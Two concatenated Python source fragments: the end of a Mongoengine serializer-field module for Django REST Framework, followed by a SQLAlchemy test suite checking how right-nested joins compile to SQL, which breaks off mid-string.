            return self.transform_document(obj, depth)
        if isinstance(obj, dict):
            return self.transform_dict(obj, depth)
        if isinstance(obj, list):
            # Lists do not consume a recursion level themselves.
            return [self.transform_object(item, depth) for item in obj]
        if obj is None:
            return None
        return smart_str(obj) if isinstance(obj, ObjectId) else obj
    def to_internal_value(self, data):
        return self.model_field.to_python(data)
    def to_representation(self, value):
        return self.transform_object(value, 1)
class ReferenceField(DocumentField):
    """
    For ReferenceField.
    We always dereference DBRef object before serialization
    TODO: Maybe support DBRef too?
    """
    default_error_messages = {
        'invalid_dbref': _('Unable to convert to internal value.'),
        'invalid_doc': _('DBRef invalid dereference.'),
    }
    type_label = 'ReferenceField'
    def __init__(self, *args, **kwargs):
        # The recursion depth for nested representation is mandatory.
        self.depth = kwargs.pop('depth')
        super(ReferenceField, self).__init__(*args, **kwargs)
    def to_internal_value(self, data):
        # Parse the incoming id into a DBRef, then resolve it to a Document.
        try:
            dbref = self.model_field.to_python(data)
        except InvalidId:
            raise ValidationError(self.error_messages['invalid_dbref'])
        instance = dereference.DeReference()([dbref])[0]
        if not isinstance(instance, Document):
            # Dereference did not resolve to an actual document.
            raise ValidationError(self.error_messages['invalid_doc'])
        return instance
    def to_representation(self, value):
        return self.transform_object(value, self.depth - 1)
class ListField(DocumentField):
    """Serializes Mongoengine ListField values via recursive transformation."""
    type_label = 'ListField'
    def __init__(self, *args, **kwargs):
        # The recursion depth for nested representation is mandatory.
        self.depth = kwargs.pop('depth')
        super(ListField, self).__init__(*args, **kwargs)
    def to_internal_value(self, data):
        # Delegate parsing to the underlying Mongoengine field.
        return self.model_field.to_python(data)
    def to_representation(self, value):
        return self.transform_object(value, self.depth - 1)
class EmbeddedDocumentField(DocumentField):
    """
    For EmbeddedDocumentField.
    Recursively serializes the embedded document, bounded by the 'depth'
    kwarg (mirroring ReferenceField/ListField).
    """
    type_label = 'EmbeddedDocumentField'
    def __init__(self, *args, **kwargs):
        try:
            self.document_type = kwargs.pop('document_type')
        except KeyError:
            raise ValueError("EmbeddedDocumentField requires 'document_type' kwarg")
        # BUG FIX: to_representation() reads self.depth, but 'depth' was never
        # popped here — so any non-None value raised AttributeError, and a
        # caller passing depth= would have crashed in serializers.Field with
        # an unexpected-kwarg TypeError. Pop it like the sibling fields do.
        try:
            self.depth = kwargs.pop('depth')
        except KeyError:
            raise ValueError("EmbeddedDocumentField requires 'depth' kwarg")
        super(EmbeddedDocumentField, self).__init__(*args, **kwargs)
    def to_representation(self, value):
        if value is None:
            return None
        else:
            return self.transform_object(value, self.depth)
    def to_internal_value(self, data):
        # Delegate parsing to the underlying Mongoengine field.
        return self.model_field.to_python(data)
class DynamicField(DocumentField):
    """Handles Mongoengine DynamicField; values are coerced via to_python."""
    type_label = 'DynamicField'
    def __init__(self, field_name=None, source=None, *args, **kwargs):
        super(DynamicField, self).__init__(*args, **kwargs)
        self.field_name = field_name
        self.source = source
        if source:
            # Mirror DRF's dotted-path source traversal setup.
            self.source_attrs = self.source.split('.')
    def to_representation(self, value):
        return self.model_field.to_python(value)
class ObjectIdField(DocumentField):
    """Maps BSON ObjectIds to their string form and back."""
    type_label = 'ObjectIdField'
    def to_representation(self, value):
        # Render the ObjectId as its hex string.
        return smart_str(value)
    def to_internal_value(self, data):
        return ObjectId(data)
class BinaryField(DocumentField):
    """Handles Mongoengine BinaryField; requires a 'max_bytes' kwarg."""
    type_label = 'BinaryField'
    def __init__(self, **kwargs):
        try:
            self.max_bytes = kwargs.pop('max_bytes')
        except KeyError:
            raise ValueError('BinaryField requires "max_bytes" kwarg')
        super(BinaryField, self).__init__(**kwargs)
    def to_representation(self, value):
        return smart_str(value)
    def to_internal_value(self, data):
        # Coerce to text first, then let the base field do the parsing.
        return super(BinaryField, self).to_internal_value(smart_str(data))
class BaseGeoField(DocumentField):
    # Shared base for geometry-typed fields; relies entirely on
    # DocumentField's generic (de)serialization.
    type_label = 'BaseGeoField'
| |
"""These tests are all about the "join rewriting" feature built
to support SQLite's lack of right-nested joins. SQLite as of
version 3.7.16 no longer has this limitation.
"""
from sqlalchemy import Column
from sqlalchemy import exists
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import literal_column
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import union
from sqlalchemy import util
from sqlalchemy.engine import default
from sqlalchemy.sql import elements
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
m = MetaData()
# Fixture schema shared by all join-rewriting tests below: a chain
# a <- b <- c <- d plus association tables and aliased variants that
# exercise right-nested join rewriting, column keys and duplicate labels.
a = Table("a", m, Column("id", Integer, primary_key=True))
b = Table(
    "b",
    m,
    Column("id", Integer, primary_key=True),
    Column("a_id", Integer, ForeignKey("a.id")),
)
b_a = Table("b_a", m, Column("id", Integer, primary_key=True))
b1 = Table(
    "b1",
    m,
    Column("id", Integer, primary_key=True),
    Column("a_id", Integer, ForeignKey("a.id")),
)
b2 = Table(
    "b2",
    m,
    Column("id", Integer, primary_key=True),
    Column("a_id", Integer, ForeignKey("a.id")),
)
# Many-to-many association between a and b.
a_to_b = Table(
    "a_to_b",
    m,
    Column("a_id", Integer, ForeignKey("a.id")),
    Column("b_id", Integer, ForeignKey("b.id")),
)
c = Table(
    "c",
    m,
    Column("id", Integer, primary_key=True),
    Column("b_id", Integer, ForeignKey("b.id")),
)
d = Table(
    "d",
    m,
    Column("id", Integer, primary_key=True),
    Column("c_id", Integer, ForeignKey("c.id")),
)
e = Table("e", m, Column("id", Integer, primary_key=True))
f = Table(
    "f",
    m,
    Column("id", Integer, primary_key=True),
    Column("a_id", ForeignKey("a.id")),
)
# b_key uses a Column key ("bid") that differs from its DB name ("id"),
# to test that rewriting respects .key rather than the column name.
b_key = Table("b_key", m, Column("id", Integer, primary_key=True, key="bid"))
a_to_b_key = Table(
    "a_to_b_key",
    m,
    Column("aid", Integer, ForeignKey("a.id")),
    Column("bid", Integer, ForeignKey("b_key.bid")),
)
class _JoinRewriteTestBase(AssertsCompiledSQL):
    # Shared test scenarios. Concrete subclasses provide the expected SQL
    # strings (class attributes such as _a_bc, _a_bkeyassoc, ...) and the
    # dialect under test via __dialect__.
    def _test(self, s, assert_):
        """Compile *s*, compare against *assert_*, then verify the compiled
        result-column metadata lines up with the statement's labeled columns."""
        self.assert_compile(s, assert_)
        compiled = s.compile(dialect=self.__dialect__)
        for rec, (name, col) in zip(
            compiled._result_columns, s._columns_plus_names
        ):
            assert col in set(rec[2])
            if (
                not isinstance(name, elements._anonymous_label)
                and name is not None
            ):
                eq_(rec[1], name)
    _a_bkeyselect_bkey = ""
    def test_a_bkeyselect_bkey(self):
        # Joins through an aliased SELECT of the association table.
        assoc = a_to_b_key.select().alias()
        j1 = assoc.join(b_key)
        j2 = a.join(j1)
        s = select([a, b_key], use_labels=True).select_from(j2)
        self._test(s, self._a_bkeyselect_bkey)
    def test_a_bc(self):
        j1 = b.join(c)
        j2 = a.join(j1)
        # TODO: if we remove 'b' or 'c', shouldn't we get just
        # the subset of cols from anon_1 ?
        # TODO: do this test also with individual cols, things change
        # lots based on how you go with this
        s = (
            select([a, b, c], use_labels=True)
            .select_from(j2)
            .where(b.c.id == 2)
            .where(c.c.id == 3)
            .order_by(a.c.id, b.c.id, c.c.id)
        )
        self._test(s, self._a_bc)
    def test_a_bc_preserve_dupes(self):
        # Duplicate columns in the columns clause must keep distinct labels.
        j1 = b.join(c)
        j2 = a.join(j1)
        s = (
            select(
                [a.c.id, b.c.id, b.c.a_id, c, b.c.a_id, c.c.b_id],
                use_labels=True,
            )
            .select_from(j2)
            .where(b.c.id == 2)
            .where(c.c.id == 3)
            .order_by(a.c.id, b.c.id, c.c.id)
        )
        self._test(s, self._a_bc_wdupes)
    def test_a_bc_preserve_dupes_anon_map(self):
        j1 = b.join(c)
        j2 = a.join(j1)
        s = (
            select(
                [a.c.id, b.c.id, b.c.a_id, c, b.c.a_id, c.c.b_id],
                use_labels=True,
            )
            .select_from(j2)
            .where(b.c.id == 2)
            .where(c.c.id == 3)
        )
        # the anon_map needs to be preserved after the transform
        # as the labels are going to be referred to outside of the query
        subq = s.subquery()
        s2 = (
            select([literal_column("1")])
            .select_from(subq)
            .where(subq.c[5] == subq.c[6])
        )
        self._test(s2, self._a_bc_wdupes_anon_map)
    def test_a_bkeyassoc(self):
        j1 = b_key.join(a_to_b_key)
        j2 = a.join(j1)
        s = select([a, b_key.c.bid], use_labels=True).select_from(j2)
        self._test(s, self._a_bkeyassoc)
    def test_a_bkeyassoc_aliased(self):
        bkey_alias = b_key.alias()
        a_to_b_key_alias = a_to_b_key.alias()
        j1 = bkey_alias.join(a_to_b_key_alias)
        j2 = a.join(j1)
        s = select([a, bkey_alias.c.bid], use_labels=True).select_from(j2)
        self._test(s, self._a_bkeyassoc_aliased)
    def test_a__b_dc(self):
        # Three levels of right-nesting: a JOIN (b JOIN (c JOIN d)).
        j1 = c.join(d)
        j2 = b.join(j1)
        j3 = a.join(j2)
        s = (
            select([a, b, c, d], use_labels=True)
            .select_from(j3)
            .where(b.c.id == 2)
            .where(c.c.id == 3)
            .where(d.c.id == 4)
            .order_by(a.c.id, b.c.id, c.c.id, d.c.id)
        )
        self._test(s, self._a__b_dc)
    def test_a_bc_comma_a1_selbc(self):
        # test here we're emulating is
        # test.orm.inheritance.test_polymorphic_rel:
        # PolymorphicJoinsTest.test_multi_join
        j1 = b.join(c)
        j2 = b.join(c).select(use_labels=True).alias()
        j3 = a.join(j1)
        a_a = a.alias()
        j4 = a_a.join(j2)
        s = (
            select([a, a_a, b, c, j2], use_labels=True)
            .select_from(j3)
            .select_from(j4)
            .order_by(j2.c.b_id)
        )
        self._test(s, self._a_bc_comma_a1_selbc)
    def test_a_atobalias_balias_c_w_exists(self):
        a_to_b_alias = a_to_b.alias()
        b_alias = b.alias()
        j1 = a_to_b_alias.join(b_alias)
        j2 = a.outerjoin(j1, a.c.id == a_to_b_alias.c.a_id)
        # TODO: if we put straight a_to_b_alias here,
        # it fails to alias the columns clause.
        s = select(
            [
                a,
                a_to_b_alias.c.a_id,
                a_to_b_alias.c.b_id,
                b_alias.c.id,
                b_alias.c.a_id,
                exists()
                .select_from(c)
                .where(c.c.b_id == b_alias.c.id)
                .label(None),
            ],
            use_labels=True,
        ).select_from(j2)
        self._test(s, self._a_atobalias_balias_c_w_exists)
    def test_a_atobalias_balias(self):
        a_to_b_alias = a_to_b.alias()
        b_alias = b.alias()
        j1 = a_to_b_alias.join(b_alias)
        j2 = a.outerjoin(j1, a.c.id == a_to_b_alias.c.a_id)
        s = select([a, a_to_b_alias, b_alias], use_labels=True).select_from(j2)
        self._test(s, self._a_atobalias_balias)
    def test_b_ab1_union_b_ab2(self):
        j1 = a.join(b1)
        j2 = a.join(b2)
        b_j1 = b.join(j1)
        b_j2 = b.join(j2)
        s = (
            union(
                select([b_j1], use_labels=True),
                select([b_j2], use_labels=True),
            )
            .subquery()
            .select(use_labels=True)
        )
        self._test(s, self._b_ab1_union_c_ab2)
    def test_b_a_id_double_overlap_annotated(self):
        # test issue #3057
        # this involves annotations so try to loop those in.
        j1 = b.join(b_a, b.c.id == b_a.c.id)
        annot = [
            b.c.id._annotate({}),
            b.c.a_id._annotate({}),
            b_a.c.id._annotate({}),
        ]
        s = select(annot).select_from(j1).apply_labels().alias()
        s = select(list(s.c)).apply_labels()
        self._test(s, self._b_a_id_double_overlap_annotated)
    def test_f_b1a_where_in_b2a(self):
        # test issue #3130
        b1a = a.join(b1)
        b2a = a.join(b2)
        subq = select([b2.c.id]).select_from(b2a)
        s = select([f]).select_from(f.join(b1a)).where(b1.c.id.in_(subq))
        s = s.apply_labels()
        self._test(s, self._f_b1a_where_in_b2a)
    def test_anon_scalar_subqueries(self):
        s1 = select([1]).scalar_subquery()
        s2 = select([2]).scalar_subquery()
        s = select([s1, s2]).apply_labels()
        self._test(s, self._anon_scalar_subqueries)
class JoinRewriteTest(_JoinRewriteTestBase, fixtures.TestBase):
    """test rendering of each join with right-nested rewritten as
    aliased SELECT statements.."""
    @util.classproperty
    def __dialect__(cls):
        # A dialect that cannot render right-nested joins, forcing the
        # compiler to rewrite them as aliased SELECTs.
        dialect = default.DefaultDialect()
        dialect.supports_right_nested_joins = False
        return dialect
    _a__b_dc = (
        "SELECT a.id AS a_id, anon_1.b_id AS b_id, "
        "anon_1.b_a_id AS b_a_id, anon_1.c_id AS c_id, "
        "anon_1.c_b_id AS c_b_id, anon_1.d_id AS d_id, "
        "anon_1.d_c_id AS d_c_id "
        "FROM a JOIN (SELECT b.id AS b_id, b.a_id AS b_a_id, "
        "anon_2.c_id AS c_id, anon_2.c_b_id AS c_b_id, "
        "anon_2.d_id AS d_id, anon_2.d_c_id AS d_c_id "
        "FROM b JOIN (SELECT c.id AS c_id, c.b_id AS c_b_id, "
        "d.id AS d_id, d.c_id AS d_c_id "
        "FROM c JOIN d ON c.id = d.c_id) AS anon_2 "
        "ON b.id = anon_2.c_b_id) AS anon_1 ON a.id = anon_1.b_a_id "
        "WHERE anon_1.b_id = :id_1 AND anon_1.c_id = :id_2 AND "
        "anon_1.d_id = :id_3 "
        "ORDER BY a.id, anon_1.b_id, anon_1.c_id, anon_1.d_id"
    )
    _a_bc = (
        "SELECT a.id AS a_id, anon_1.b_id AS b_id, "
        "anon_1.b_a_id AS b_a_id, anon_1.c_id AS c_id, "
        "anon_1.c_b_id AS c_b_id FROM a JOIN "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, "
        "c.id AS c_id, c.b_id AS c_b_id "
        "FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
        "ON a.id = anon_1.b_a_id "
        "WHERE anon_1.b_id = :id_1 AND anon_1.c_id = :id_2 "
        "ORDER BY a.id, anon_1.b_id, anon_1.c_id"
    )
    _a_bc_wdupes = (
        "SELECT a.id AS a_id, anon_1.b_id AS b_id, anon_1.b_a_id AS b_a_id, "
        "anon_1.c_id AS c_id, anon_1.c_b_id AS c_b_id, "
        "anon_1.b_a_id AS b_a_id_1, anon_1.c_b_id AS c_b_id_1 "
        "FROM a JOIN "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, c.id AS c_id, "
        "c.b_id AS c_b_id "
        "FROM b JOIN c ON b.id = c.b_id) AS anon_1 ON a.id = anon_1.b_a_id "
        "WHERE anon_1.b_id = :id_1 AND anon_1.c_id = :id_2 "
        "ORDER BY a.id, anon_1.b_id, anon_1.c_id"
    )
    # NOTE: this attribute was previously assigned twice with byte-identical
    # (modulo line wrapping) string values; the dead first assignment has
    # been removed.
    _a_bc_wdupes_anon_map = (
        "SELECT 1 FROM (SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
        "c.id AS c_id, c.b_id AS c_b_id, b.a_id AS b_a_id_1, "
        "c.b_id AS c_b_id_1 FROM a JOIN (b JOIN c ON b.id = c.b_id) "
        "ON a.id = b.a_id WHERE b.id = :id_1 AND c.id = :id_2) AS anon_1 "
        "WHERE anon_1.b_a_id_1 = anon_1.c_b_id_1"
    )
    _a_bc_comma_a1_selbc = (
        "SELECT a.id AS a_id, a_1.id AS a_1_id, anon_1.b_id AS b_id, "
        "anon_1.b_a_id AS b_a_id, anon_1.c_id AS c_id, "
        "anon_1.c_b_id AS c_b_id, anon_2.b_id AS anon_2_b_id, "
        "anon_2.b_a_id AS anon_2_b_a_id, anon_2.c_id AS anon_2_c_id, "
        "anon_2.c_b_id AS anon_2_c_b_id FROM a "
        "JOIN (SELECT b.id AS b_id, b.a_id AS b_a_id, c.id AS c_id, "
        "c.b_id AS c_b_id FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
        "ON a.id = anon_1.b_a_id, "
        "a AS a_1 JOIN "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, "
        "c.id AS c_id, c.b_id AS c_b_id "
        "FROM b JOIN c ON b.id = c.b_id) AS anon_2 "
        "ON a_1.id = anon_2.b_a_id ORDER BY anon_2.b_id"
    )
    _a_bkeyassoc = (
        "SELECT a.id AS a_id, anon_1.b_key_id AS b_key_id "
        "FROM a JOIN "
        "(SELECT b_key.id AS b_key_id, a_to_b_key.aid AS a_to_b_key_aid, "
        "a_to_b_key.bid AS a_to_b_key_bid FROM b_key "
        "JOIN a_to_b_key ON b_key.id = a_to_b_key.bid) AS anon_1 "
        "ON a.id = anon_1.a_to_b_key_aid"
    )
    _a_bkeyassoc_aliased = (
        "SELECT a.id AS a_id, anon_1.b_key_1_id AS b_key_1_id "
        "FROM a JOIN (SELECT b_key_1.id AS b_key_1_id, "
        "a_to_b_key_1.aid AS a_to_b_key_1_aid, "
        "a_to_b_key_1.bid AS a_to_b_key_1_bid FROM b_key AS b_key_1 "
        "JOIN a_to_b_key AS a_to_b_key_1 ON b_key_1.id = a_to_b_key_1.bid) AS "
        "anon_1 ON a.id = anon_1.a_to_b_key_1_aid"
    )
    _a_bkeyselect_bkey = (
        "SELECT a.id AS a_id, anon_1.b_key_id AS b_key_id "
        "FROM a JOIN (SELECT anon_2.aid AS anon_2_aid, "
        "anon_2.bid AS anon_2_bid, "
        "b_key.id AS b_key_id "
        "FROM (SELECT a_to_b_key.aid AS aid, a_to_b_key.bid AS bid "
        "FROM a_to_b_key) AS anon_2 "
        "JOIN b_key ON b_key.id = anon_2.bid) AS anon_1 "
        "ON a.id = anon_1.anon_2_aid"
    )
    _a_atobalias_balias_c_w_exists = (
        "SELECT a.id AS a_id, "
        "anon_1.a_to_b_1_a_id AS a_to_b_1_a_id, "
        "anon_1.a_to_b_1_b_id AS a_to_b_1_b_id, "
        "anon_1.b_1_id AS b_1_id, anon_1.b_1_a_id AS b_1_a_id, "
        "EXISTS (SELECT * FROM c WHERE c.b_id = anon_1.b_1_id) AS anon_2 "
        "FROM a LEFT OUTER JOIN (SELECT a_to_b_1.a_id AS a_to_b_1_a_id, "
        "a_to_b_1.b_id AS a_to_b_1_b_id, b_1.id AS b_1_id, "
        "b_1.a_id AS b_1_a_id "
        "FROM a_to_b AS a_to_b_1 "
        "JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) AS anon_1 "
        "ON a.id = anon_1.a_to_b_1_a_id"
    )
    _a_atobalias_balias = (
        "SELECT a.id AS a_id, anon_1.a_to_b_1_a_id AS a_to_b_1_a_id, "
        "anon_1.a_to_b_1_b_id AS a_to_b_1_b_id, anon_1.b_1_id AS b_1_id, "
        "anon_1.b_1_a_id AS b_1_a_id FROM a LEFT OUTER JOIN "
        "(SELECT a_to_b_1.a_id AS a_to_b_1_a_id, "
        "a_to_b_1.b_id AS a_to_b_1_b_id, "
        "b_1.id AS b_1_id, b_1.a_id AS b_1_a_id FROM a_to_b AS a_to_b_1 "
        "JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) AS anon_1 "
        "ON a.id = anon_1.a_to_b_1_a_id"
    )
    _b_ab1_union_c_ab2 = (
        "SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
        "anon_1.a_id AS anon_1_a_id, anon_1.b1_id AS anon_1_b1_id, "
        "anon_1.b1_a_id AS anon_1_b1_a_id FROM "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, anon_2.a_id AS a_id, "
        "anon_2.b1_id AS b1_id, anon_2.b1_a_id AS b1_a_id "
        "FROM b JOIN (SELECT a.id AS a_id, b1.id AS b1_id, b1.a_id AS b1_a_id "
        "FROM a JOIN b1 ON a.id = b1.a_id) AS anon_2 ON anon_2.a_id = b.a_id "
        "UNION "
        "SELECT b.id AS b_id, b.a_id AS b_a_id, anon_3.a_id AS a_id, "
        "anon_3.b2_id AS b2_id, anon_3.b2_a_id AS b2_a_id "
        "FROM b JOIN (SELECT a.id AS a_id, b2.id AS b2_id, b2.a_id AS b2_a_id "
        "FROM a JOIN b2 ON a.id = b2.a_id) AS anon_3 ON anon_3.a_id = b.a_id) "
        "AS anon_1"
    )
    _b_a_id_double_overlap_annotated = (
        "SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
        "anon_1.b_a_id_1 AS anon_1_b_a_id_1 "
        "FROM (SELECT b.id AS b_id, b.a_id AS b_a_id, b_a.id AS b_a_id_2 "
        "FROM b JOIN b_a ON b.id = b_a.id) AS anon_1"
    )
    _f_b1a_where_in_b2a = (
        "SELECT f.id AS f_id, f.a_id AS f_a_id "
        "FROM f JOIN (SELECT a.id AS a_id, b1.id AS b1_id, b1.a_id AS b1_a_id "
        "FROM a JOIN b1 ON a.id = b1.a_id) AS anon_1 ON anon_1.a_id = f.a_id "
        "WHERE anon_1.b1_id IN (SELECT b2.id "
        "FROM a JOIN b2 ON a.id = b2.a_id)"
    )
    _anon_scalar_subqueries = (
        "SELECT (SELECT 1) AS anon_1, (SELECT 2) AS anon_2"
    )
class JoinPlainTest(_JoinRewriteTestBase, fixtures.TestBase):
    """test rendering of each join with normal nesting."""

    # The default dialect is used as-is; the expected SQL below therefore
    # keeps right-nested, parenthesized JOINs in place rather than rewriting
    # them into anonymous subqueries.
    @util.classproperty
    def __dialect__(cls):
        dialect = default.DefaultDialect()
        return dialect

    # Each attribute below is the expected compiled SQL for the
    # correspondingly-named test defined on the base class.
    _a_bkeyselect_bkey = (
        "SELECT a.id AS a_id, b_key.id AS b_key_id FROM a JOIN "
        "((SELECT a_to_b_key.aid AS aid, a_to_b_key.bid AS bid "
        "FROM a_to_b_key) AS anon_1 JOIN b_key ON b_key.id = anon_1.bid) "
        "ON a.id = anon_1.aid"
    )
    _a__b_dc = (
        "SELECT a.id AS a_id, b.id AS b_id, "
        "b.a_id AS b_a_id, c.id AS c_id, "
        "c.b_id AS c_b_id, d.id AS d_id, "
        "d.c_id AS d_c_id "
        "FROM a JOIN (b JOIN (c JOIN d ON c.id = d.c_id) "
        "ON b.id = c.b_id) ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2 AND "
        "d.id = :id_3 "
        "ORDER BY a.id, b.id, c.id, d.id"
    )
    _a_bc = (
        "SELECT a.id AS a_id, b.id AS b_id, "
        "b.a_id AS b_a_id, c.id AS c_id, "
        "c.b_id AS c_b_id FROM a JOIN "
        "(b JOIN c ON b.id = c.b_id) "
        "ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2 "
        "ORDER BY a.id, b.id, c.id"
    )
    # Duplicate column references get _1-suffixed labels.
    _a_bc_wdupes = (
        "SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, c.id AS c_id, "
        "c.b_id AS c_b_id, b.a_id AS b_a_id_1, c.b_id AS c_b_id_1 "
        "FROM a JOIN "
        "(b JOIN c ON b.id = c.b_id) "
        "ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2 "
        "ORDER BY a.id, b.id, c.id"
    )
    _a_bc_wdupes_anon_map = (
        "SELECT 1 FROM (SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
        "c.id AS c_id, c.b_id AS c_b_id, b.a_id AS b_a_id_1, "
        "c.b_id AS c_b_id_1 "
        "FROM a JOIN (b JOIN c ON b.id = c.b_id) ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2) AS anon_1 "
        "WHERE anon_1.b_a_id_1 = anon_1.c_b_id_1"
    )
    _a_bc_comma_a1_selbc = (
        "SELECT a.id AS a_id, a_1.id AS a_1_id, b.id AS b_id, "
        "b.a_id AS b_a_id, c.id AS c_id, "
        "c.b_id AS c_b_id, anon_1.b_id AS anon_1_b_id, "
        "anon_1.b_a_id AS anon_1_b_a_id, anon_1.c_id AS anon_1_c_id, "
        "anon_1.c_b_id AS anon_1_c_b_id FROM a "
        "JOIN (b JOIN c ON b.id = c.b_id) "
        "ON a.id = b.a_id, "
        "a AS a_1 JOIN "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, "
        "c.id AS c_id, c.b_id AS c_b_id "
        "FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
        "ON a_1.id = anon_1.b_a_id ORDER BY anon_1.b_id"
    )
    _a_bkeyassoc = (
        "SELECT a.id AS a_id, b_key.id AS b_key_id "
        "FROM a JOIN "
        "(b_key JOIN a_to_b_key ON b_key.id = a_to_b_key.bid) "
        "ON a.id = a_to_b_key.aid"
    )
    _a_bkeyassoc_aliased = (
        "SELECT a.id AS a_id, b_key_1.id AS b_key_1_id FROM a "
        "JOIN (b_key AS b_key_1 JOIN a_to_b_key AS a_to_b_key_1 "
        "ON b_key_1.id = a_to_b_key_1.bid) ON a.id = a_to_b_key_1.aid"
    )
    # EXISTS in the columns clause is labeled anon_1.
    _a_atobalias_balias_c_w_exists = (
        "SELECT a.id AS a_id, a_to_b_1.a_id AS a_to_b_1_a_id, "
        "a_to_b_1.b_id AS a_to_b_1_b_id, b_1.id AS b_1_id, "
        "b_1.a_id AS b_1_a_id, "
        "EXISTS (SELECT * FROM c WHERE c.b_id = b_1.id) AS anon_1 "
        "FROM a LEFT OUTER JOIN "
        "(a_to_b AS a_to_b_1 JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) "
        "ON a.id = a_to_b_1.a_id"
    )
    _a_atobalias_balias = (
        "SELECT a.id AS a_id, a_to_b_1.a_id AS a_to_b_1_a_id, "
        "a_to_b_1.b_id AS a_to_b_1_b_id, b_1.id AS b_1_id, "
        "b_1.a_id AS b_1_a_id "
        "FROM a LEFT OUTER JOIN (a_to_b AS a_to_b_1 "
        "JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) ON a.id = a_to_b_1.a_id"
    )
    _b_ab1_union_c_ab2 = (
        "SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
        "anon_1.a_id AS anon_1_a_id, anon_1.b1_id AS anon_1_b1_id, "
        "anon_1.b1_a_id AS anon_1_b1_a_id FROM "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, "
        "b1.id AS b1_id, "
        "b1.a_id AS b1_a_id FROM b "
        "JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = b.a_id "
        "UNION "
        "SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, b2.id AS b2_id, "
        "b2.a_id AS b2_a_id FROM b "
        "JOIN (a JOIN b2 ON a.id = b2.a_id) ON a.id = b.a_id) AS anon_1"
    )
    _b_a_id_double_overlap_annotated = (
        "SELECT anon_1.b_id AS anon_1_b_id, anon_1.b_a_id AS anon_1_b_a_id, "
        "anon_1.b_a_id_1 AS anon_1_b_a_id_1 FROM "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, b_a.id AS b_a_id_1 "
        "FROM b JOIN b_a ON b.id = b_a.id) AS anon_1"
    )
    _f_b1a_where_in_b2a = (
        "SELECT f.id AS f_id, f.a_id AS f_a_id "
        "FROM f JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = f.a_id "
        "WHERE b1.id IN (SELECT b2.id "
        "FROM a JOIN b2 ON a.id = b2.a_id)"
    )
    _anon_scalar_subqueries = (
        "SELECT (SELECT 1) AS anon_1, (SELECT 2) AS anon_2"
    )
class JoinNoUseLabelsTest(_JoinRewriteTestBase, fixtures.TestBase):
    """test rendering of each join with use_labels disabled, on a dialect
    that does not support right-nested joins."""

    @util.classproperty
    def __dialect__(cls):
        dialect = default.DefaultDialect()
        dialect.supports_right_nested_joins = False
        return dialect

    def _test(self, s, assert_):
        # Unlike the base class, compile without labeled columns.
        s.use_labels = False
        self.assert_compile(s, assert_)

    # Each attribute below is the expected compiled SQL for the
    # correspondingly-named test defined on the base class; column labels
    # are absent because use_labels is False.
    _a_bkeyselect_bkey = (
        "SELECT a.id, b_key.id FROM a JOIN ((SELECT a_to_b_key.aid AS aid, "
        "a_to_b_key.bid AS bid FROM a_to_b_key) AS anon_1 "
        "JOIN b_key ON b_key.id = anon_1.bid) ON a.id = anon_1.aid"
    )
    _a__b_dc = (
        "SELECT a.id, b.id, "
        "b.a_id, c.id, "
        "c.b_id, d.id, "
        "d.c_id "
        "FROM a JOIN (b JOIN (c JOIN d ON c.id = d.c_id) "
        "ON b.id = c.b_id) ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2 AND "
        "d.id = :id_3 "
        "ORDER BY a.id, b.id, c.id, d.id"
    )
    _a_bc = (
        "SELECT a.id, b.id, "
        "b.a_id, c.id, "
        "c.b_id FROM a JOIN "
        "(b JOIN c ON b.id = c.b_id) "
        "ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2 "
        "ORDER BY a.id, b.id, c.id"
    )
    _a_bc_wdupes = (
        "SELECT a.id, b.id, b.a_id, c.id, c.b_id, b.a_id, c.b_id "
        "FROM a JOIN "
        "(b JOIN c ON b.id = c.b_id) "
        "ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2 "
        "ORDER BY a.id, b.id, c.id"
    )
    # The wrapping subquery still gets labeled columns internally.
    _a_bc_wdupes_anon_map = (
        "SELECT 1 FROM (SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
        "c.id AS c_id, c.b_id AS c_b_id, b.a_id AS b_a_id_1, "
        "c.b_id AS c_b_id_1 "
        "FROM a JOIN (b JOIN c ON b.id = c.b_id) ON a.id = b.a_id "
        "WHERE b.id = :id_1 AND c.id = :id_2) AS anon_1 "
        "WHERE anon_1.b_a_id_1 = anon_1.c_b_id_1"
    )
    _a_bc_comma_a1_selbc = (
        "SELECT a.id, a_1.id, b.id, "
        "b.a_id, c.id, "
        "c.b_id, anon_1.b_id, "
        "anon_1.b_a_id, anon_1.c_id, "
        "anon_1.c_b_id FROM a "
        "JOIN (b JOIN c ON b.id = c.b_id) "
